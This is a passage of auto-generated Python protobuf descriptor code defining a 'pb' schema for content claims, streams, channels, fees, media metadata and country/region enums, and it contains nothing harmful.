options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R144', index=418, number=418,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R145', index=419, number=419,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R051', index=420, number=420,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R031', index=421, number=421,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R048', index=422, number=422,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R196', index=423, number=423,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R268', index=424, number=424,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R368', index=425, number=425,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R376', index=426, number=426,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R400', index=427, number=427,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R414', index=428, number=428,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R422', index=429, number=429,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R512', index=430, number=430,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R634', index=431, number=431,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R682', index=432, number=432,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R275', index=433, number=433,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R760', index=434, number=434,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R792', index=435, number=435,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R784', index=436, number=436,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R887', index=437, number=437,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R150', index=438, number=438,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R151', index=439, number=439,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R112', index=440, number=440,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R100', index=441, number=441,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R203', index=442, number=442,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R348', index=443, number=443,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R616', index=444, number=444,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R498', index=445, number=445,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R642', index=446, number=446,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R643', index=447, number=447,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R703', index=448, number=448,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R804', index=449, number=449,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R154', index=450, number=450,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R248', index=451, number=451,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R830', index=452, number=452,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R831', index=453, number=453,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R832', index=454, number=454,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R680', index=455, number=455,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R208', index=456, number=456,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R233', index=457, number=457,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R234', index=458, number=458,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R246', index=459, number=459,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R352', index=460, number=460,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R372', index=461, number=461,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R833', index=462, number=462,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R428', index=463, number=463,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R440', index=464, number=464,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R578', index=465, number=465,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R744', index=466, number=466,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R752', index=467, number=467,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R826', index=468, number=468,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R039', index=469, number=469,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R008', index=470, number=470,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R020', index=471, number=471,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R070', index=472, number=472,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R191', index=473, number=473,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R292', index=474, number=474,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R300', index=475, number=475,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R336', index=476, number=476,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R380', index=477, number=477,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R470', index=478, number=478,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R499', index=479, number=479,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R807', index=480, number=480,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R620', index=481, number=481,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R674', index=482, number=482,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R688', index=483, number=483,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R705', index=484, number=484,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R724', index=485, number=485,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R155', index=486, number=486,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R040', index=487, number=487,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R056', index=488, number=488,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R250', index=489, number=489,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R276', index=490, number=490,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R438', index=491, number=491,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R442', index=492, number=492,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R492', index=493, number=493,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R528', index=494, number=494,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R756', index=495, number=495,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R009', index=496, number=496,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R053', index=497, number=497,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R036', index=498, number=498,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R162', index=499, number=499,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R166', index=500, number=500,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R334', index=501, number=501,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R554', index=502, number=502,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R574', index=503, number=503,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R054', index=504, number=504,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R242', index=505, number=505,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R540', index=506, number=506,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R598', index=507, number=507,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R090', index=508, number=508,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R548', index=509, number=509,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R057', index=510, number=510,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R316', index=511, number=511,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R296', index=512, number=512,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R584', index=513, number=513,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R583', index=514, number=514,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R520', index=515, number=515,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R580', index=516, number=516,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R585', index=517, number=517,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R581', index=518, number=518,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R061', index=519, number=519,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R016', index=520, number=520,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R184', index=521, number=521,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R258', index=522, number=522,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R570', index=523, number=523,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R612', index=524, number=524,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R882', index=525, number=525,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R772', index=526, number=526,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R776', index=527, number=527,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R798', index=528, number=528,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R876', index=529, number=529,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=5337,
serialized_end=10561,
)
_sym_db.RegisterEnumDescriptor(_LOCATION_COUNTRY)
_CLAIM = _descriptor.Descriptor(
name='Claim',
full_name='pb.Claim',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='stream', full_name='pb.Claim.stream', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='channel', full_name='pb.Claim.channel', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='collection', full_name='pb.Claim.collection', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='repost', full_name='pb.Claim.repost', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='title', full_name='pb.Claim.title', index=4,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='description', full_name='pb.Claim.description', index=5,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='thumbnail', full_name='pb.Claim.thumbnail', index=6,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tags', full_name='pb.Claim.tags', index=7,
number=11, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='languages', full_name='pb.Claim.languages', index=8,
number=12, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='locations', full_name='pb.Claim.locations', index=9,
number=13, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='type', full_name='pb.Claim.type',
index=0, containing_type=None, fields=[]),
],
serialized_start=20,
serialized_end=319,
)
_STREAM = _descriptor.Descriptor(
name='Stream',
full_name='pb.Stream',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source', full_name='pb.Stream.source', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='author', full_name='pb.Stream.author', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='license', full_name='pb.Stream.license', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='license_url', full_name='pb.Stream.license_url', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='release_time', full_name='pb.Stream.release_time', index=4,
number=5, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='fee', full_name='pb.Stream.fee', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='image', full_name='pb.Stream.image', index=6,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='video', full_name='pb.Stream.video', index=7,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='audio', full_name='pb.Stream.audio', index=8,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='software', full_name='pb.Stream.software', index=9,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='type', full_name='pb.Stream.type',
index=0, containing_type=None, fields=[]),
],
serialized_start=322,
serialized_end=582,
)
_CHANNEL = _descriptor.Descriptor(
name='Channel',
full_name='pb.Channel',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='public_key', full_name='pb.Channel.public_key', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='email', full_name='pb.Channel.email', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='website_url', full_name='pb.Channel.website_url', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='cover', full_name='pb.Channel.cover', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='featured', full_name='pb.Channel.featured', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=584,
serialized_end=709,
)
_CLAIMREFERENCE = _descriptor.Descriptor(
name='ClaimReference',
full_name='pb.ClaimReference',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='claim_hash', full_name='pb.ClaimReference.claim_hash', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=711,
serialized_end=747,
)
_CLAIMLIST = _descriptor.Descriptor(
name='ClaimList',
full_name='pb.ClaimList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='list_type', full_name='pb.ClaimList.list_type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='claim_references', full_name='pb.ClaimList.claim_references', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_CLAIMLIST_LISTTYPE,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=750,
serialized_end=894,
)
_SOURCE = _descriptor.Descriptor(
name='Source',
full_name='pb.Source',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='hash', full_name='pb.Source.hash', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='pb.Source.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='size', full_name='pb.Source.size', index=2,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='media_type', full_name='pb.Source.media_type', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='url', full_name='pb.Source.url', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sd_hash', full_name='pb.Source.sd_hash', index=5,
number=6, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='bt_infohash', full_name='pb.Source.bt_infohash', index=6,
number=7, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=896,
serialized_end=1017,
)
_FEE = _descriptor.Descriptor(
name='Fee',
full_name='pb.Fee',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='currency', full_name='pb.Fee.currency', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='address', full_name='pb.Fee.address', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='amount', full_name='pb.Fee.amount', index=2,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_FEE_CURRENCY,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1020,
serialized_end=1155,
)
_IMAGE = _descriptor.Descriptor(
name='Image',
full_name='pb.Image',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='width', full_name='pb.Image.width', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='height', full_name='pb.Image.height', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1157,
serialized_end=1195,
)
_VIDEO = _descriptor.Descriptor(
name='Video',
full_name='pb.Video',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='width', full_name='pb.Video.width', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='height', full_name='pb.Video.height', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='duration', full_name='pb.Video.duration', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='audio', full_name='pb.Video.audio', index=3,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1197,
serialized_end=1279,
)
_AUDIO = _descriptor.Descriptor(
name='Audio',
full_name='pb.Audio',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='duration', full_name='pb.Audio.duration', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1281,
serialized_end=1306,
)
_SOFTWARE = _descriptor.Descriptor(
name='Software',
full_name='pb.Software',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='os', full_name='pb.Software.os', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_SOFTWARE_OS,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1308,
serialized_end=1416,
)
_LANGUAGE = _descriptor.Descriptor(
name='Language',
full_name='pb.Language',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='language', full_name='pb.Language.language', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='script', full_name='pb.Language.script', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='region', full_name='pb.Language.region', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_LANGUAGE_LANGUAGE,
_LANGUAGE_SCRIPT,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1419,
serialized_end=5202,
)
_LOCATION = _descriptor.Descriptor(
name='Location',
full_name='pb.Location',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='country', full_name='pb.Location.country', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='state', full_name='pb.Location.state', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='city', full_name='pb.Location.city', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='code', full_name='pb.Location.code', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='latitude', full_name='pb.Location.latitude', index=4,
number=5, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='longitude', full_name='pb.Location.longitude', index=5,
number=6, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_LOCATION_COUNTRY,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5205,
serialized_end=10561,
)
_CLAIM.fields_by_name['stream'].message_type = _STREAM
_CLAIM.fields_by_name['channel'].message_type = _CHANNEL
_CLAIM.fields_by_name['collection'].message_type = _CLAIMLIST
_CLAIM.fields_by_name['repost'].message_type = _CLAIMREFERENCE
_CLAIM.fields_by_name['thumbnail'].message_type = _SOURCE
_CLAIM.fields_by_name['languages'].message_type = _LANGUAGE
_CLAIM.fields_by_name['locations'].message_type = _LOCATION
_CLAIM.oneofs_by_name['type'].fields.append(
_CLAIM.fields_by_name['stream'])
_CLAIM.fields_by_name['stream'].containing_oneof = _CLAIM.oneofs_by_name['type']
_CLAIM.oneofs_by_name['type'].fields.append(
_CLAIM.fields_by_name['channel'])
_CLAIM.fields_by_name['channel'].containing_oneof = _CLAIM.oneofs_by_name['type']
_CLAIM.oneofs_by_name['type'].fields.append(
_CLAIM.fields_by_name['collection'])
_CLAIM.fields_by_name['collection'].containing_oneof = _CLAIM.oneofs_by_name['type']
_CLAIM.oneofs_by_name['type'].fields.append(
_CLAIM.fields_by_name['repost'])
_CLAIM.fields_by_name['repost'].containing_oneof = _CLAIM.oneofs_by_name['type']
_STREAM.fields_by_name['source'].message_type = _SOURCE
_STREAM.fields_by_name['fee'].message_type = _FEE
_STREAM.fields_by_name['image'].message_type = _IMAGE
_STREAM.fields_by_name['video'].message_type = _VIDEO
_STREAM.fields_by_name['audio'].message_type = _AUDIO
_STREAM.fields_by_name['software'].message_type = _SOFTWARE
_STREAM.oneofs_by_name['type'].fields.append(
_STREAM.fields_by_name['image'])
_STREAM.fields_by_name['image'].containing_oneof = _STREAM.oneofs_by_name['type']
_STREAM.oneofs_by_name['type'].fields.append(
_STREAM.fields_by_name['video'])
_STREAM.fields_by_name['video'].containing_oneof = _STREAM.oneofs_by_name['type']
_STREAM.oneofs_by_name['type'].fields.append(
_STREAM.fields_by_name['audio'])
_STREAM.fields_by_name['audio'].containing_oneof = _STREAM.oneofs_by_name['type']
_STREAM.oneofs_by_name['type'].fields.append(
_STREAM.fields_by_name['software'])
_STREAM.fields_by_name['software'].containing_oneof = _STREAM.oneofs_by_name['type']
_CHANNEL.fields_by_name['cover'].message_type = _SOURCE
_CHANNEL.fields_by_name['featured'].message_type = _CLAIMLIST
_CLAIMLIST.fields_by_name['list_type'].enum_type = _CLAIMLIST_LISTTYPE
_CLAIMLIST.fields_by_name['claim_references'].message_type = _CLAIMREFERENCE
_CLAIMLIST_LISTTYPE.containing_type = _CLAIMLIST
